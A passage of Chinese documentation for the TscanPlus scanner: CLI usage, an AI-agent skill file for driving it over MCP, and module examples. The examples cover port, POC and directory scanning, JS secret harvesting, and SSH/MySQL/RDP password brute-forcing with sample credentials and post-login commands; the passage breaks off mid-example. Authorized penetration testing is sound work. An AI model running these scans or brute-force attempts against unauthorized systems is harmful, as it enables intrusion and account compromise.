./TscanClient -m js -u https://example.com -wt 10
```
此命令对example.com进行JS文件敏感信息收集,Web请求超时10秒。
### 空间测绘参数(cyber模块)
| 参数 | 说明 | 默认值 |
|-------|-----------------------------------------------------|-----|
| `-ck` | 空间测绘查询语句,例如:-ck domain="tidesec.com",多个关键词可用逗号(,)分隔 | - |
**空间测绘使用示例:**
**空间测绘API的key需要在`config.yaml`文件中手动配置,也可把`无影(TscanPlus)`的配置文件拷贝过来直接使用。**
```bash
# 查询特定域名的资产
TscanClient -m cyber -ck domain="example.com"
# 查询特定IP段的资产
TscanClient -m cyber -ck ip="192.168.1.0/24"
# 查询特定服务的资产
TscanClient -m cyber -ck service="nginx"
# 空间测绘后进行进一步扫描
TscanClient -m cyber,port,poc -ck domain="example.com"
```
### 批量扫描示例
```bash
# 对C段进行全面扫描
TscanClient -h 192.168.1.0/24 -m port,url,poc,crack
# 从URL文件加载并进行全面扫描
TscanClient -uf target-urls.txt -m url,poc,dir,js
```
### 综合扫描示例
```bash
# 端口扫描+指纹识别+POC检测+弱口令破解
TscanClient -h 192.168.1.0/24 -p 1-65535 -t 1000 -m port,url,poc,crack
# 全功能扫描
TscanClient -h 192.168.1.0/24 -d example.com -m port,url,poc,crack,dir,js,domain,cyber
```
<div align=center><img src=images/image-20250327205918003.png width=80% ></div>
## 与TscanPlus的关系
TscanClient 是 TscanPlus 的命令行版本,两者共享核心功能和检测引擎:
- TscanClient 与 TscanPlus 共享配置文件 config.yaml 和数据库 config.db
- TscanClient 具有更好的跨平台兼容性,支持更多操作系统环境
- TscanClient 适合自动化脚本集成和服务器环境使用
- TscanPlus 提供图形界面,更适合需要可视化展示的环境
## 使用注意事项
- 扫描前请确保已获得授权,未经授权的扫描行为可能违反法律法规
- 建议先使用较小的线程数和端口范围进行测试,避免对目标系统造成过大负载
- 针对生产环境进行扫描时,建议在非业务高峰期进行
- 使用代理进行扫描时,请确保代理配置正确且稳定
更多信息可参考 TscanPlus 项目:[https://github.com/TideSec/TscanPlus](https://github.com/TideSec/TscanPlus)
+115
View File
@@ -0,0 +1,115 @@
# TscanPlus Agent Skillskillpack
本目录为 **唯一权威** Skill 来源,与 IDE/产品无关,供 MCP Agent、GUI 导出 zip、Cursor 等使用。
| 文件 | 说明 |
|------|------|
| `SKILL.md` | Agent 行为说明(授权、八大模块、工具参数、MCP 接入、汇报格式) |
| `examples.md` | 各模块 MCP 对话与参数示例 |
| `mcp-config-example.json` | MCP `mcpServers` 配置示例 |
MCP 服务配置(`mcp stdio` / `mcp serve`)见 `SKILL.md` 正文。
---
## 获取 Skill 包
请用下列方式之一取得与 `TscanPlus-skill` 相同的文件(`SKILL.md``examples.md``README.md``mcp-config-example.json`):
| 方式 | 说明 |
|------|------|
| **GUI 导出(推荐)** | TscanPlus → **AI 辅助****MCP 服务配置****导出 Skill 模板**,得到 `TscanPlus-skill.zip`,解压到任意目录 |
| **仓库源码** | 使用 `TscanPlus-skill/` 下文件,或克隆项目后从该目录复制 |
解压 zip 后目录示例:
```text
tscanplus-mcp-skill/
SKILL.md
examples.md
README.md
mcp-config-example.json
```
再按下方「各宿主如何引用」**导入或手工配置**;仅配置 MCP、不导入 Skill 时见文末「无 Skill、仅 MCP」。
---
## 各宿主如何引用
### Claude Desktop
**Skill** 从 zip 解压得到 `SKILL.md`,将「授权」至「排错」章节复制到 **Settings → Profile → Custom Instructions**(无内置 Skill 目录,只能手工粘贴)。
**MCP**`claude_desktop_config.json``mcpServers` 中加入 `stdio``url`(可参考 `mcp-config-example.json`),修改后重启应用。
### VS Code / JetBrains 等(支持 MCP 的扩展)
**Skill** 将解压后的 `SKILL.md` 要点写入 `.github/copilot-instructions.md` 或扩展指定的 `AGENTS.md` / rules 目录。
**MCP** 在扩展 MCP 设置中添加 `tscanplus`JSON 结构见 `mcp-config-example.json`
### Cline、Roo Code、Continue 等 IDE 插件
**Skill** 将解压后的 `SKILL.md` 全文或核心章节粘贴到插件的 **Custom Rules / .clinerules / 系统提示**`examples.md` 可作参考,不必全部导入。
**MCP** 插件中添加 MCP Serverstdio 或 sse),参数见 `SKILL.md``mcp-config-example.json`
### CursorCursor IDE / Cursor CLI
**Skill(下载后导入或手工配置)**
1. **获取文件**GUI 导出 `TscanPlus-skill.zip` 并解压(见上文「获取 Skill 包」)。
2. **创建目录**(二选一):
- **当前项目**`<你的项目根>/.cursor/skills/tscanplus/`
- **全局(所有项目)**`~/.cursor/skills/tscanplus/`Windows 为 `%USERPROFILE%\.cursor\skills\tscanplus\`
3. **复制文件**:将解压得到的 `SKILL.md` 放入该目录;建议同时放入 `examples.md`Agent 可读同目录示例)。
4. **重载**:保存后重启 Cursor,或在设置中重载窗口,使 Skill 生效。
5. **使用**:对话输入 `@tscanplus` 引用技能,或依赖 `SKILL.md` 头部 `description` 自动匹配。
目录结构示例:
```text
.cursor/skills/tscanplus/
SKILL.md
examples.md # 可选,建议保留
```
**MCP**
- 全局:`~/.cursor/mcp.json`
- 项目:`<仓库>/.cursor/mcp.json`
```json
{
"mcpServers": {
"tscanplus": {
"command": "/绝对路径/TscanPlus",
"args": ["mcp", "stdio"]
}
}
}
```
### 自托管 Agent / 其他 MCP 客户端
1. **MCP**`mcp-config-example.json` 配置 `mcpServers`,推荐 `stdio`
2. **行为:** 将解压后的 `SKILL.md` 作为系统提示附件,或写入自有 Agent 策略 YAML。
3. **HTTP** 默认 Streamable HTTP`TscanPlus mcp serve -listen 127.0.0.1:8088`,客户端填 `http://127.0.0.1:8088/mcp`;旧客户端可用 `-transport sse`,填 `http://127.0.0.1:8088/sse`
### 无 Skill、仅 MCP
仅配置 MCP 时 Agent 仍可调用工具,但可能缺少授权策略、默认 `MCP` 项目语义与汇报格式。建议至少合并 `SKILL.md` 的「授权」「项目名 MCP」「调用后如何汇报」三节。
---
## 文件对照
| 用途 | 开发者(仓库内) | 普通用户(导出 zip 后) |
|------|------------------|-------------------------|
| Skill 源文件 | `TscanPlus-skill/SKILL.md` | 解压目录中的 `SKILL.md` |
| 示例 | `TscanPlus-skill/examples.md` | 解压目录中的 `examples.md` |
| Cursor 生效位置 | `.cursor/skills/tscanplus/SKILL.md` | 自行复制到 `~/.cursor/skills/tscanplus/` 或项目 `.cursor/skills/tscanplus/` |
+375
View File
@@ -0,0 +1,375 @@
---
name: tscanplus
description: >-
Operates TscanPlus security scanner via MCP tools or CLI for authorized targets only.
Use when the user mentions TscanPlus, port/URL/POC/subdomain scanning, MCP integration,
ip_scan, tscan_scan, or recon on IPs, domains, or URLs in any AI assistant with MCP support.
---
# TscanPlus 扫描助手
通过 **MCP 工具**(首选)或 **CLI** 驱动 TscanPlus(与无影 GUI 版共享 `config.yaml``config.db`)。参数语义对齐 **TscanClient** 命令行版(`-m` 八大模块、`-h/-u/-d/-ck` 等)。
> 本文档为 Agent Skill,可放入宿主技能目录,或复制章节到自定义系统提示。对话示例见 [examples.md](examples.md)。
## 授权(强制)
- 仅对用户**明确拥有书面授权**的目标扫描(自有 lab、渗透项目 scope 内)。
- 未获授权时:**拒绝扫描**,并说明原因。
- 默认避免:全端口 `1-65535`、大范围 C 段、生产环境、开启 `poc_check`/`pwd_check`/`poc_full`,除非用户明确要求。
- 资产过多时不要一次开启全部模块,以免耗时过久或占满 CPU。
- 扫描前用一句话复述:目标、模块、是否含 POC/爆破。
## 产品能力概览
TscanPlus / CLI 集成八大安全检测模块:
| 模块 | CLI `-m` | MCP 单工具 | 说明 |
|------|----------|------------|------|
| 端口扫描 | `port` | `ip_scan` | IP/CIDR、存活探测、端口、可选服务指纹/POC/弱口令 |
| Web 指纹 | `url` | `url_scan` | URL 指纹识别、Title、可选联动 POC |
| POC 验证 | `poc` | `poc_scan` | xray 1.0 格式 POC,可按指纹或全量 |
| 弱口令 | `crack` | `pwd_crack` | 多协议爆破,`targets``host:port` |
| 目录枚举 | `dir` | `dir_scan` | 路径爆破,可自定义字典 |
| JS 敏感信息 | `js` | `js_scan` | JS 文件中密钥、接口等 |
| 子域名 | `domain` | `subdomain_scan` | 字典 + 可选 APIkey 在 config.yaml |
| 空间测绘 | `cyber` | `cyber_search` | Hunter/FOFA 等(引擎在 config.yaml |
**多模块联动**使用 `tscan_scan``modules` 对应 `-m`,流程与 GUI 项目管理一致:
**cyber → domain → port → crack → url → poc → dir → js**
前一项的**全部结果**会作为下一项的输入。常用组合(授权 lab 内):
| 场景 | `modules` / CLI `-m` |
|------|----------------------|
| 内网主机摸底 | `port,url,poc``port,poc,crack` |
| Web 专项 | `url,poc,dir,js` |
| 域名资产 | `domain,port,url,poc` |
| 测绘后深挖 | `cyber,port,url,poc` |
## MCP 工具选型
| 用户意图 | 优先工具 | 说明 |
|----------|----------|------|
| 单 IP/CIDR 看端口 | `ip_scan` | `target` 必填;先小范围 `ports` |
| 多目标只扫端口+弱口令+POC | `ip_scan``tscan_scan` | `ip_scan``pwd_check`/`poc_check` |
| 一批 URL 指纹/Web | `url_scan` | `targets` 逗号分隔 |
| 已知 URL 打 POC | `poc_scan` | 慎用 `poc_full` |
| 弱口令 | `pwd_crack` | `targets`: `192.168.1.1:22,192.168.1.1:3306` |
| 目录 / JS | `dir_scan` / `js_scan` | 需完整 URL |
| 子域名 | `subdomain_scan` | `domains`API 需 config |
| 空间测绘 | `cyber_search` | `query` 对齐 `-ck` |
| 多阶段、结果传递 | `tscan_scan` | 大任务可分阶段执行 |
## 通用参数(MCP / CLI
| MCP / 含义 | CLI | 默认 | 说明 |
|------------|-----|------|------|
| `project` | `-pr` | 未指定→`MCP` | 写入 `config.db` 的项目名;见下文「项目 MCP」 |
| `fresh_project` | — | `false` | 指定 `project` 时是否先清空该项目 |
| `proxy` | `-proxy` | 配置全局代理 | HTTP/SOCKS5**端口扫描仅 SOCKS5** |
| `include_results` | — | `true` | 响应 JSON 是否带 `data.results` |
| `result_limit` | — | `200` | 每类结果最多条数,最大 `2000` |
| `ping_scan` | 未用 `-np` 即探测 | `true` | 存活探测 |
| `smart_scan` | 未用 `-nosmart` | `true` | 大网段启发式扫描(`tscan_scan` |
| `timeout` | `-time` | `3` | 通用超时(秒) |
| `web_timeout` | `-wt` | `10` | Web 超时(秒) |
**结果存放:**
- MCP 工具返回 JSON`data.results``data.counts`)。
- CLI 写日志 `TscanPlus-Result.txt` 及各模块 txt,并写入 **`config.db`**(可与 GUI 共用)。
## 项目名 `MCP` 的行为
| 情况 | 行为 |
|------|------|
| 未传 `project` | 使用 **`MCP`**,**本次工具调用前**自动清空该项目数据 |
| 传 `project=自定义名` | 默认**追加**;清空则 `fresh_project=true` |
**GUI 注意:** 单工具(如 `ip_scan`)可能不在项目列表显示行,但 `ipscan` 等表可有 `Project='MCP'``tscan_scan` 会在 `project` 表登记。
---
## 各模块参数(MCP ↔ CLI
### 1. 端口扫描 `ip_scan``port`
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `target` | `-h` | 必填 | `192.168.1.1``192.168.1.0/24`、范围 |
| `ports` | `-p` | `Top100` | `22``1-65535``22,80,443` |
| `thread` | `-t` | `600` | 并发 |
| `timeout` | `-time` | `3` | 秒 |
| `ping_scan` | 默认探测 / `-np` 关闭 | `true` | 存活探测 |
| `ip_finger` | 服务指纹 | 配置项 | 服务识别 |
| `poc_check` | 联动 POC | `false` | 开放端口转 URL 后 POC |
| `pwd_check` | 联动 crack | `false` | 弱口令 |
| `proxy` | `-proxy` | — | 建议 SOCKS5 |
`tscan_scan` 额外:`ports_add``-pa``exclude_hosts``-hn``smart_scan``-nosmart` 取反。
### 2. Web 指纹 `url_scan``url`
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `targets` | `-u` / `-uf` 内容 | 必填 | URL,逗号或换行分隔 |
| `thread` | URL 线程 | `50` | |
| `web_timeout` | `-wt` | `10` | 秒 |
| `finger` | `-finger` | `tiny` | `tiny` / `min` / `all` |
| `cookie` | `-cookie` | — | 认证场景 |
| `poc_check` | 联动 POC | `false` | |
| `proxy` | `-proxy` | — | |
### 3. POC `poc_scan``poc`
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `targets` | `-u` | 必填 | HTTP(S) URL |
| `thread` | `-num` | `20` | POC 并发 |
| `poc_full` | `-full` | `false` | `true` 时不匹配指纹,扫全部 POC |
| `poc_name` | `-pocname` | — | 如 `weblogic` |
| `poc_level` | `-poclevel` | `1+2+3+4+5` | 级别过滤 |
| `proxy` | `-proxy` | — | |
POC 路径在 `config.yaml`xray 1.0 格式),与 GUI 一致。
### 4. 弱口令 `pwd_crack``crack`
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `targets` | `-h` | 必填 | **`host:port`**,逗号分隔 |
| `services` | `-s` | `all` | `ssh,mysql,rdp` 等 |
| `user` | `-user` | 内置字典 | 逗号分隔多个 |
| `pwd` | `-pwd` | 内置字典 | |
| `cmd` | `-c` | `whoami` | 成功后执行命令 |
| `thread` | `-br` | `1` | 爆破线程 |
| `timeout` | `-time` | `3` | |
### 5. 子域名 `subdomain_scan``domain`
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `domains` | `-d` | 必填 | 逗号分隔主域 |
| `sub_api` | `-api` | `false` | API key 在 `config.yaml` |
| `sub_dict` | `-dc` | 内置 | **绝对路径** |
| `ports` | 联动扫描端口 | `80,443` | 发现子域后的端口 |
| `proxy` | `-proxy` | — | |
### 6. 目录 `dir_scan``dir`
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `urls` | `-u` | 必填 | 基 URL |
| `thread` | `-ds` | `20` | |
| `dict` | `-dd` | 内置 10k | **绝对路径** |
| `timeout` | `-time` | `3` | |
| `proxy` | `-proxy` | — | |
### 7. JS `js_scan``js`
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `urls` | `-u` | 必填 | |
| `timeout` | `-time` / Web | `3` | |
| `proxy` | `-proxy` | — | |
### 8. 空间测绘 `cyber_search``cyber`
与 GUI「空间测绘」页字段下拉一致;`field` 决定如何把 `query` 转成各引擎 API 语句。
| MCP 参数 | CLI | 默认 | 说明 |
|----------|-----|------|------|
| `query` | `-ck` | 必填 | 见下表「query 写法」 |
| `field` | 查询类型 | `domain` | 见下表 |
| `engines` | — | config 已启用 | 逗号分隔引擎名 |
| `project` / `fresh_project` | `-pr` | `MCP` / `false` | 同通用参数 |
| `include_results` / `result_limit` | — | `true` / `200` | 同通用参数 |
**`field` 可选值(对齐 GUI):**
| `field` | GUI 名称 | `query` 示例(不加引号) |
|---------|----------|-------------------------|
| `domain` | 域名 | `example.com` |
| `ip` | IP 地址 | `1.1.1.1``192.168.1.0/24` |
| `port` | 端口 | `80``3306` |
| `product` | 应用 | `nginx``apache` |
| `title` | 标题 | `管理后台` |
| `service` | 服务 | `mysql``ssh` |
| `cert` | 证书 | 证书关键词 |
| `icp` | 备案 | 备案号或主体名 |
| `body` | Body | 页面正文关键词 |
| `icon` | Icon | Icon URL 或 hash |
| `custom` | 自定义 | 各平台完整语法,如 `domain="example.com" && port="443"` |
**用法要点:**
- **推荐**:选具体 `field``query` 只填关键词(与 GUI 搜索框相同),不要写 `domain="xxx"` 这类包装语法。
- **`custom`**:各测绘平台语法不同,一般无法跨平台通用;需自行按平台调试。
- **多关键词**:逗号分隔,如 `example.com,example.net`(与 GUI 一致)。
- CLI `-ck` 常写完整语句时,MCP 应设 `field=custom`;或 `-ck example.com` 配合默认 `domain`
`tscan_scan` 中用 `cyber_query` 传查询内容,`cyber_field` 传上表字段类型(默认 `domain`)。
### 9. 综合扫描 `tscan_scan`
在单模块参数基础上,常用额外字段:
| MCP 参数 | CLI | 说明 |
|----------|-----|------|
| `targets` | `-h/-u/-d/-ck` 等 | 按 `modules` 解析目标 |
| `modules` | `-m` | 默认 `port,url,poc` |
| `domains` | `-d` | `domain` 模块主域 |
| `cyber_query` | `-ck` | 测绘语句 |
| `ports` / `ports_add` | `-p` / `-pa` | |
| `exclude_hosts` | `-hn` | |
| `thread` / `url_thread` / `poc_thread` / `dir_thread` | `-t` 等 | |
| `finger` | `-finger` | |
| `poc_full` / `poc_name` / `poc_level` | POC 相关 | |
| `crack_*` | `-s/-user/-pwd/-c/-br` | 弱口令 |
| `sub_api` / `sub_dict` | 子域 | |
| `dir_dict` | `-dd` | |
---
## 推荐参数(默认保守)
**单主机端口(首选入门):**
```yaml
tool: ip_scan
target: "10.0.0.1"
ports: "80,443,8080,8443,22"
ping_scan: true
ip_finger: false
poc_check: false
pwd_check: false
thread: 200
timeout: 3
include_results: true
result_limit: 100
```
**内网 C 段(lab,控制范围):**
```yaml
tool: tscan_scan
targets: "192.168.1.0/24"
modules: "port,url"
ports: "Top100"
thread: "300"
ping_scan: true
smart_scan: true
include_results: true
result_limit: 200
```
**仅在用户明确要求时启用:** `poc_check``pwd_check``poc_full``modules``poc`/`crack`、全端口。
---
## MCP 接入
### stdio(推荐)
```json
{
"mcpServers": {
"tscanplus": {
"command": "/绝对路径/TscanPlus",
"args": ["mcp", "stdio"]
}
}
}
```
### Streamable HTTP(推荐远程传输)
```bash
TscanPlus mcp serve -listen 127.0.0.1:8088
# 或显式指定:-transport streamable
```
```json
{
"mcpServers": {
"tscanplus": {
"url": "http://127.0.0.1:8088/mcp"
}
}
}
```
### HTTP+SSE(旧版兼容)
```bash
TscanPlus mcp serve -listen 127.0.0.1:8088 -transport sse
```
```json
{
"mcpServers": {
"tscanplus": {
"url": "http://127.0.0.1:8088/sse"
}
}
}
```
GUI**AI 辅助 → MCP 服务配置** 可选择传输模式(Streamable HTTP / HTTP+SSE),启停服务并导出 Skill 模板 zip。
各宿主引用见 [README.md](README.md)。
---
## 调用后如何汇报
解析 JSON`success``message``data`):
1. **摘要**:目标、模块、开放端口/URL 数、高危 `poc_vul`
2. **表格化列表**`results.ipscan` / `urlscan` / `poccheck` / `pwdcrack` / `dirscan` / `jsfinder` / `subdomain` / `cyber` 关键字段。
3. **`project_cleared: true`**:已清空默认 `MCP` 项目旧数据。
4. `counts` > `result_limit`:说明仅返回前 N 条,全量在 `config.db` 或 GUI。
不要只回复「扫描完成」。
---
## 常见工作流
1. **IP → Web → 漏洞:** `ip_scan`(常见 Web 端口)→ 拼 URL → `url_scan` → 用户确认 → `poc_scan`
2. **子域 → 端口 → Web** `subdomain_scan``tscan_scan``modules=port,url`)→ 按需 POC
3. **测绘 → 扫描:** `cyber_search` → 提取 IP/URL → 用户确认 → `ip_scan` / `url_scan`
4. **单项目持续:** 全程 `project=pentest-xx`,阶段结束用 `fresh_project=true` 重扫
## 排错
| 现象 | 处理 |
|------|------|
| 看不到 TscanPlus 工具 | 检查 MCP 配置、二进制绝对路径、重载 MCP |
| 长时间无响应 | 同步阻塞扫描;缩小 `ports`/`targets`,先关 POC/爆破 |
| 卡在 `xxx open` | 升级版本;重启 `mcp serve` 或 GUI 内 MCP 服务 |
| GUI 无 MCP 项目行 | 单工具可能不写 `project` 表;查库表或改用 `tscan_scan` |
| 测绘/子域无结果 | 检查 `config.yaml` 中 API Key、Engines |
| 结果与 GUI 不一致 | 共用同一 `config.yaml` / `config.db` |
## MCP 不可用时的 CLI
```bash
# 默认:port + url + poc-h 触发)
TscanPlus -h 192.168.1.1/24
TscanPlus -m port -h 192.168.1.1 -p 80,443,3306 -t 600
TscanPlus -m url,poc,dir,js -uf urls.txt -finger tiny
TscanPlus -m domain,port,url,poc -d example.com -api
TscanPlus -m crack -h 192.168.1.1 -p 22 -s ssh -user root -pwd 123456
TscanPlus -m cyber,port,poc -ck 'domain="example.com"'
TscanPlus -pr MyProject -m port,url,poc -h 192.168.1.1
TscanPlus mcp stdio
TscanPlus mcp serve -listen 127.0.0.1:8088
TscanPlus mcp serve -listen 127.0.0.1:8088 -transport sse
```
CLI 不自动清空项目;MCP 未指定 `project` 时默认 `MCP` 且每次调用前清空。
+709
View File
@@ -0,0 +1,709 @@
# TscanPlus MCP 对话与模块示例
以下示例适用于任何能调用 TscanPlus MCP 工具的 AI 助手。参数语义对齐 **TscanClient** / **TscanPlus CLI**`-m` 八大模块)。执行前须确认**授权**。
**模块对照:** `port``ip_scan``url``url_scan``poc``poc_scan``crack``pwd_crack``dir``dir_scan``js``js_scan``domain``subdomain_scan``cyber``cyber_search`,多模块联动→`tscan_scan`
---
## 一、端口扫描 `ip_scan`port
### 示例 1-1:单 IP 常见 Web 端口
**用户:** 帮我扫 10.211.55.2 有哪些常见 Web 端口。
**Agent**
1. 确认授权。
2. 调用 `ip_scan`
```yaml
target: "10.211.55.2"
ports: "80,443,8080,8443,8000,8888,22"
ping_scan: true
ip_finger: false
poc_check: false
pwd_check: false
thread: 200
timeout: 3
include_results: true
```
3. 汇报 `data.results.ipscan``host``port``target``title`
**CLI 等价:** `TscanPlus -m port -h 10.211.55.2 -p 80,443,8080,8443,8000,8888,22 -t 200`
---
### 示例 1-2C 段 Top100lab
**用户:** 扫 192.168.1.0/24 的 Top100 端口,不要 POC。
```yaml
tool: ip_scan
target: "192.168.1.0/24"
ports: "Top100"
thread: 400
ping_scan: true
poc_check: false
pwd_check: false
include_results: true
result_limit: 300
```
**CLI** `TscanPlus -m port -h 192.168.1.0/24 -t 400`
---
### 示例 1-3:指定端口 + 服务指纹
**用户:** 对 192.168.1.10 扫 22,80,443,3306,3389 并识别服务。
```yaml
tool: ip_scan
target: "192.168.1.10"
ports: "22,80,443,3306,3389"
ip_finger: true
poc_check: false
thread: 300
```
---
### 示例 1-4:端口扫描联动弱口令(需明确授权)
**用户:** 已对 192.168.1.5 授权,对 22 和 3306 做弱口令检测。
```yaml
tool: ip_scan
target: "192.168.1.5"
ports: "22,3306"
pwd_check: true
poc_check: false
thread: 100
```
**CLI** `TscanPlus -m port,crack -h 192.168.1.5 -p 22,3306`
---
### 示例 1-5:端口 + POC(需明确授权)
```yaml
tool: ip_scan
target: "10.0.0.100"
ports: "80,443,8080"
poc_check: true
pwd_check: false
thread: 200
```
---
## 二、Web 指纹 `url_scan`url
### 示例 2-1:单 URL 指纹
**用户:** 识别 http://test.com:8080 的 Web 指纹。
```yaml
tool: url_scan
targets: "http://test.com:8080"
finger: tiny
web_timeout: 10
poc_check: false
thread: 30
include_results: true
```
**CLI** `TscanPlus -m url -u http://test.com:8080 -finger tiny`
---
### 示例 2-2:批量 URL
**用户:** 对这些站做 Web 探测:a.com 和 b.com 的 https。
```yaml
tool: url_scan
targets: "https://a.com,https://www.b.com"
finger: min
thread: 50
include_results: true
```
**CLI** `TscanPlus -m url -u https://a.com,https://www.b.com -finger min`
---
### 示例 2-3:带 Cookie 的认证站
```yaml
tool: url_scan
targets: "http://internal.com/admin/"
cookie: "session=abc123; token=xyz"
finger: tiny
web_timeout: 15
```
**CLI** `TscanPlus -m url -u http://internal.com/admin/ -cookie "session=abc123"`
---
### 示例 2-4URL 指纹 + 联动 POC
**用户:** 已对下列 URL 授权打 POC。
```yaml
tool: url_scan
targets: "http://10.0.0.1:8080,http://10.0.0.2"
poc_check: true
finger: tiny
thread: 30
```
**CLI** `TscanPlus -m url,poc -u http://10.0.0.1:8080,http://10.0.0.2`
---
### 示例 2-5:代理访问
```yaml
tool: url_scan
targets: "http://target.com"
proxy: "http://127.0.0.1:8080"
finger: all
```
---
## 三、POC 漏洞 `poc_scan`poc
### 示例 3-1:默认 POC(匹配指纹)
```yaml
tool: poc_scan
targets: "http://test.com"
thread: 20
poc_full: false
include_results: true
```
**CLI** `TscanPlus -m poc -u http://test.com`
---
### 示例 3-2:指定 POC 名称
**用户:** 用 weblogic 相关 POC 测 http://10.0.0.8:7001。
```yaml
tool: poc_scan
targets: "http://10.0.0.8:7001"
poc_name: weblogic
thread: 15
```
**CLI** `TscanPlus -m poc -u http://10.0.0.8:7001 -pocname weblogic`
---
### 示例 3-3:全量 POC(高危,需授权)
```yaml
tool: poc_scan
targets: "http://vuln.com"
poc_full: true
thread: 10
poc_level: "1+2+3"
```
**CLI** `TscanPlus -m poc -u http://vuln.com -full -poclevel 1+2+3`
---
### 示例 3-4:批量 URL 文件场景(Agent 拆分)
**用户:** 我有 50 个 URL 要打 POC。
Agent:分批逗号传入(每批 ≤20),或建议用户改用 CLI `-uf urls.txt`
```yaml
tool: poc_scan
targets: "http://a.com,http://b.com"
thread: 20
```
---
## 四、弱口令 `pwd_crack`crack
### 示例 4-1SSH 单主机
```yaml
tool: pwd_crack
targets: "192.168.1.1:22"
services: ssh
user: "root,admin"
pwd: "123456,password,admin123"
thread: 2
timeout: 5
```
**CLI** `TscanPlus -m crack -h 192.168.1.1 -p 22 -s ssh -user root,admin -pwd 123456,password`
---
### 示例 4-2MySQL
```yaml
tool: pwd_crack
targets: "192.168.1.20:3306"
services: mysql
thread: 1
```
---
### 示例 4-3:多目标多服务
```yaml
tool: pwd_crack
targets: "10.0.0.1:22,10.0.0.1:3389,10.0.0.2:3306"
services: "ssh,rdp,mysql"
thread: 1
```
---
### 示例 4-4:爆破成功后执行命令
```yaml
tool: pwd_crack
targets: "192.168.1.1:22"
services: ssh
cmd: "id"
user: root
pwd: "toor,123456"
```
**CLI** `TscanPlus -m crack -h 192.168.1.1 -p 22 -s ssh -c "id"`
---
## 五、子域名 `subdomain_scan`domain
### 示例 5-1:单域字典枚举
```yaml
tool: subdomain_scan
domains: "example.com"
sub_api: false
ports: "80,443"
include_results: true
```
**CLI** `TscanPlus -m domain -d example.com`
---
### 示例 5-2:多域 + APIconfig 已配 key
```yaml
tool: subdomain_scan
domains: "example.com,example.org"
sub_api: true
ports: "80,443,8080"
```
**CLI** `TscanPlus -m domain -d example.com,example.org -api`
---
### 示例 5-3:自定义字典
```yaml
tool: subdomain_scan
domains: "target.com"
sub_dict: "/path/to/subdomains.txt"
sub_api: false
```
**CLI** `TscanPlus -m domain -d target.com -dc /path/to/subdomains.txt`
---
## 六、目录扫描 `dir_scan`dir
### 示例 6-1:内置字典
```yaml
tool: dir_scan
urls: "http://test.com"
thread: 30
timeout: 5
include_results: true
```
**CLI** `TscanPlus -m dir -u http://test.com`
---
### 示例 6-2:自定义字典 + 高线程
```yaml
tool: dir_scan
urls: "https://test.com"
dict: "/path/to/dirlist.txt"
thread: 50
```
**CLI** `TscanPlus -m dir -u https://test.com -dd /path/to/dirlist.txt -ds 50`
---
## 七、JS 敏感信息 `js_scan`js
### 示例 7-1:单站 JS 收集
```yaml
tool: js_scan
urls: "https://test.com"
timeout: 10
include_results: true
```
**CLI** `TscanPlus -m js -u https://test.com -wt 10`
---
### 示例 7-2:多 URL
```yaml
tool: js_scan
urls: "https://a.com,https://b.com"
proxy: "socks5://127.0.0.1:1080"
```
---
## 八、空间测绘 `cyber_search`cyber
> 须在 `config.yaml` 配置 Hunter/FOFA 等引擎与 Key。
### 示例 8-1:按域名查资产(与 GUI 相同)
```yaml
tool: cyber_search
query: example.com
field: domain
include_results: true
```
**CLI** `TscanPlus -m cyber -ck example.com`(或完整语法 `-ck 'domain="example.com"'` 时需 `field=custom`
---
### 示例 8-2:按 IP 段
```yaml
tool: cyber_search
query: 192.168.1.0/24
field: ip
```
---
### 示例 8-3:按标题查(指定引擎)
```yaml
tool: cyber_search
query: 管理后台
field: title
engines: "hunter,fofa"
include_results: true
```
---
### 示例 8-4:自定义平台语法
```yaml
tool: cyber_search
query: 'domain="example.com" && port="443"'
field: custom
engines: "fofa"
```
---
## 九、综合扫描 `tscan_scan`(多模块联动)
联动顺序:**cyber → domain → port → crack → url → poc → dir → js**
### 示例 9-1:端口 + Web(最常用)
**用户:** 对 192.168.1.100 做端口和 Web 指纹,先不要 POC。
```yaml
tool: tscan_scan
targets: "192.168.1.100"
modules: "port,url"
ports: "Top100"
thread: "300"
url_thread: "50"
finger: tiny
ping_scan: true
include_results: true
```
**CLI** `TscanPlus -m port,url -h 192.168.1.100 -finger tiny`
---
### 示例 9-2:内网 C 段 端口+URL+POC(授权)
```yaml
tool: tscan_scan
targets: "192.168.1.0/24"
modules: "port,url,poc"
ports: "Top100"
thread: "400"
poc_thread: "15"
finger: tiny
include_results: true
result_limit: 500
```
**CLI** `TscanPlus -h 192.168.1.0/24 -m port,url,poc`(默认 -m
---
### 示例 9-3:端口 + 弱口令 + POC
```yaml
tool: tscan_scan
targets: "192.168.1.0/24"
modules: "port,crack,url,poc"
ports: "22,80,443,3306,3389,8080"
crack_services: "ssh,mysql,rdp"
thread: "300"
```
**CLI** `TscanPlus -m port,poc,crack -h 192.168.1.0/24 -p 22,80,443,3306,3389,8080`
---
### 示例 9-4:子域 → 端口 → Web → POC
```yaml
tool: tscan_scan
targets: "example.com"
domains: "example.com"
modules: "domain,port,url,poc"
sub_api: true
ports: "80,443,8080"
thread: "200"
include_results: true
```
**CLI** `TscanPlus -m domain,port,url,poc -d example.com -api`
---
### 示例 9-5Web 全链路 url+poc+dir+js
```yaml
tool: tscan_scan
targets: "http://test.com,http://api.test.com"
modules: "url,poc,dir,js"
finger: tiny
dir_thread: "30"
include_results: true
```
**CLI** `TscanPlus -m url,poc,dir,js -u http://test.com,http://api.test.com`
---
### 示例 9-6:测绘后联动扫描
```yaml
tool: tscan_scan
targets: target.com
cyber_query: target.com
cyber_field: domain
modules: "cyber,port,url"
ports: "Top100"
thread: "300"
```
**CLI** `TscanPlus -m cyber,port,url -ck target.com`
---
### 示例 9-7:追加端口、排除主机
```yaml
tool: tscan_scan
targets: "10.0.0.0/24"
modules: "port,url"
ports: "Top100"
ports_add: "3389,5985,6379"
exclude_hosts: "10.0.0.1"
smart_scan: true
thread: "400"
```
**CLI** `TscanPlus -m port,url -h 10.0.0.0/24 -pa 3389,5985,6379 -hn 10.0.0.1`
---
### 示例 9-8:关闭启发式大网段扫描
```yaml
tool: tscan_scan
targets: "10.0.0.0/16"
modules: "port"
ports: "80,443"
